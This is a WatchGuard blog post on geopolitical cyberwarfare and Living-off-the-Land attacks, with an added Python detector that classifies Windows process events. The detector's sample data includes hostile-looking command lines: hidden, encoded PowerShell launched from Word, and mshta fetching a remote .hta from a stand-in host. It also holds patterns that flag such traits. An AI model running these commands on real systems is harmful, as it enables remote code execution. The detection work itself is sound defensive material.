WatchGuard Blog

The cold cyberwar and geopolitics: which weapons can protect endpoints?

Following World War II, the technological and arms race that began between the United States and the Soviet Union became known as the Cold War. The Cold War nowadays has entered into a new phase: cyberwarfare. Technology is increasingly being used to gain a competitive edge in global geopolitics, and governments are increasingly concerned about the strength of national defenses against foreign intelligence agencies and attacks from other countries.

The three leading players in the current scenario are the United States, China, and Russia, and 2020 has already been a busy year, with cyberattacks used as a launchpad for espionage, disinformation campaigns, and even simply financial gain.

U.S. intelligence agencies, for instance, have gathered evidence that Russian, Chinese, and Iranian state agents have been using social media and other campaigns, including spam, to spread misinformation in the United States and interfere with presidential elections. They have also specifically accused six Russian citizens of this type of hacking. There are many other examples: UK intelligence services found that Russian agents had been plotting to disrupt the (now canceled) Tokyo Olympics. State-sponsored groups have been accused of attempting to infiltrate several health organizations working on coronavirus vaccines. Microsoft and other organizations have been fighting to shut down a botnet used in election interference. Chinese operatives have also been accused of politically motivated hacking of diplomats and NGOs. And governments such as North Korea's have been accused of using ransomware for financial gain.

The year 2020 has also stood out for the cyberwar between Israel and Iran. "It is another common type of conflict," Arik Brabbing, former head of the Israel Security Agency's SigInt and Cyber Division, told the Washington Post. He neither personally confirmed nor denied that, following a recent cyberattack by Iran on Israeli water supply infrastructure, there was a retaliatory attack on the control systems of a major Iranian port that disrupted activities in and around the port for many weeks. Regarding the attack on the water supply system, Brabbing confirmed that it was part of the strategic infrastructure of the State of Israel, controlled by the Israeli National Cyber Directorate (INCD), and added that the worst part was that it was not identified early enough, which exposed the weakness of the cyberdefenses.

As global tensions rise and cyber weapons evolve, it seems clear that cyberwar activity is taking place with no agreed conventions between countries. Moreover, the complexities involved in attributing responsibility for attacks further exacerbate existing geopolitical tensions. And as the world adopts 5G technology, the consequences, scale, and scope of digital attacks could increase exponentially.

These are some of the issues that led the World Economic Forum to identify cyberattacks as the greatest non-environmental threat to humanity. The World Economic Forum's 2018 Global Risk Report warned that "the use of cyberattacks to target critical infrastructure and strategic industrial sectors (…) could trigger a breakdown in the systems that keep societies functioning," and this warning was repeated in the 2019 and 2020 reports. Cyberwarfare has undeniably become a major concern for businesses and the economy, yet not everyone is ready to deal with it.

What role has the COVID-19 pandemic played in the evolution of threats?

The COVID-19 pandemic has been accompanied by another associated threat: cyberterrorism. Online attacks on highly vulnerable and sensitive state agencies and systems have increased during the coronavirus crisis, including hospitals and scientific research laboratories, as well as other utilities essential to businesses and consumers, such as infrastructure networks and electricity, gas, or water systems.

According to Corey Nachreiner, Chief Technology Officer, "the COVID-19 pandemic has not had a major impact on cyberwarfare. The Cold Cyberwar had already initiated before the pandemic, and while it offers new opportunities to spread misinformation, it doesn't change the political landscape that drives these conflicts in the shadows. Having said that," he adds, "we have witnessed state-sponsored hackers leveraging the pandemic, primarily targeting organizations that may be researching a vaccine. We assume that this is more down to countries trying to gain an advantage in vaccine development, rather than actually attacking the country itself."

"Living-off-the-Land" attacks in cyberwarfare

One factor that has greatly aided these cyberwarfare attacks is that they don't require malware to be installed on target systems; they can instead be carried out through programs that are legitimately present and trusted on those systems.

"Living-off-the-Land" attacks take advantage of legitimate tools that are already present on the operating system in order to gain control of systems. Smart adversaries do this because these legitimate tools are less likely to be recognized as malicious by security systems. Fortunately, however, advanced cybersecurity solutions such as Adaptive Defense 360 are available on the market. They combine endpoint protection and detection technologies with 100% process classification services in order to prevent these "Living-off-the-Land" attacks from occurring. Tools such as these provide detailed visibility into all activity across all endpoints, complete monitoring of running processes, and, ultimately, a reduction of the attack surface.
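The detection idea behind the paragraph above, as an added illustration that is not WatchGuard's or Adaptive Defense 360's own code: every process-creation event is classified rather than assumed benign, and a signed, legitimate OS utility is judged by its context (which process spawned it and what command line it received) instead of by its signature alone. The event records, the publisher allowlist, the set of dual-use binaries, and the command-line patterns are all constructed for the example; a real EDR would draw them from its telemetry and a much larger classification catalogue.

```python
"""Context-based classification of process-creation events to surface
Living-off-the-Land activity. Added example with constructed data; it does
not reproduce any vendor's detection logic."""
import re
from typing import Dict, Iterable, Optional, Tuple

# Constructed allowlist of code-signing publishers treated as "known good".
TRUSTED_SIGNERS = {"Microsoft Windows", "Microsoft Corporation"}

# Legitimate, signed OS utilities that are present on every host and are
# therefore attractive to attackers who want to avoid dropping malware.
# Constructed subset for the example.
DUAL_USE_BINARIES = {
    "powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe",
    "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe", "bitsadmin.exe",
}

# Document-handling applications that have little reason to spawn a shell or
# script host; a child from this set is a strong contextual signal.
DOCUMENT_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "acrord32.exe"}

# Command-line traits that are unusual for interactive or administrative use.
SUSPICIOUS_CMDLINE = [
    (re.compile(r"-(enc|encodedcommand)\b", re.I), "encoded command"),
    (re.compile(r"(-w|-windowstyle)\s+hidden", re.I), "hidden window"),
    (re.compile(r"https?://", re.I), "remote URL passed to a system utility"),
]

# Constructed process-creation events in a simplified EDR/Sysmon-like shape.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\svchost.exe",
     "parent": r"C:\Windows\System32\services.exe",
     "cmdline": "svchost.exe -k netsvcs", "signer": "Microsoft Windows"},
    {"image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": "WINWORD.EXE /n invoice.docx", "signer": "Microsoft Corporation"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": "powershell.exe -w hidden -enc <base64 omitted>", "signer": "Microsoft Windows"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "powershell.exe -NoProfile -Command Get-Service", "signer": "Microsoft Windows"},
    {"image": r"C:\Users\alice\Downloads\update.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": "update.exe", "signer": None},
    {"image": r"C:\Windows\System32\mshta.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": "mshta.exe http://updates.example.invalid/notice.hta", "signer": "Microsoft Windows"},
]


def basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return re.split(r"[\\/]", path)[-1].lower()


def classify(event: Dict[str, Optional[str]]) -> Tuple[str, str]:
    """Return (verdict, reason); verdicts are 'trusted', 'unknown' or 'suspicious'."""
    image = basename(event["image"] or "")
    parent = basename(event.get("parent") or "")
    cmdline = event.get("cmdline") or ""
    signer = event.get("signer")

    # 1. Not signed by an allowlisted publisher: the process is not classified
    #    as goodware, so it is held for classification rather than allowed on trust.
    if signer not in TRUSTED_SIGNERS:
        return "unknown", f"publisher {signer!r} not in allowlist"

    # 2. A legitimate tool is judged by its context, not by its signature.
    if image in DUAL_USE_BINARIES:
        if parent in DOCUMENT_PARENTS:
            return "suspicious", f"{image} spawned by document application {parent}"
        for pattern, label in SUSPICIOUS_CMDLINE:
            if pattern.search(cmdline):
                return "suspicious", f"{image} with {label}"

    return "trusted", "signed by allowlisted publisher, no risky context"


def summarize(events: Iterable[Dict[str, Optional[str]]]) -> Dict[str, int]:
    """Count verdicts across a batch of events (the 'every process classified' view)."""
    counts = {"trusted": 0, "unknown": 0, "suspicious": 0}
    for ev in events:
        verdict, _ = classify(ev)
        counts[verdict] += 1
    return counts


if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        verdict, reason = classify(ev)
        print(f"{verdict:10} {basename(ev['image']):16} {reason}")
    print(summarize(SAMPLE_EVENTS))
```

Note that the fourth event (PowerShell launched from a command prompt for an ordinary administrative query) stays "trusted" even though it is the same signed binary as the third: the signal comes from the parent and command line, which is the point of classifying context rather than binaries.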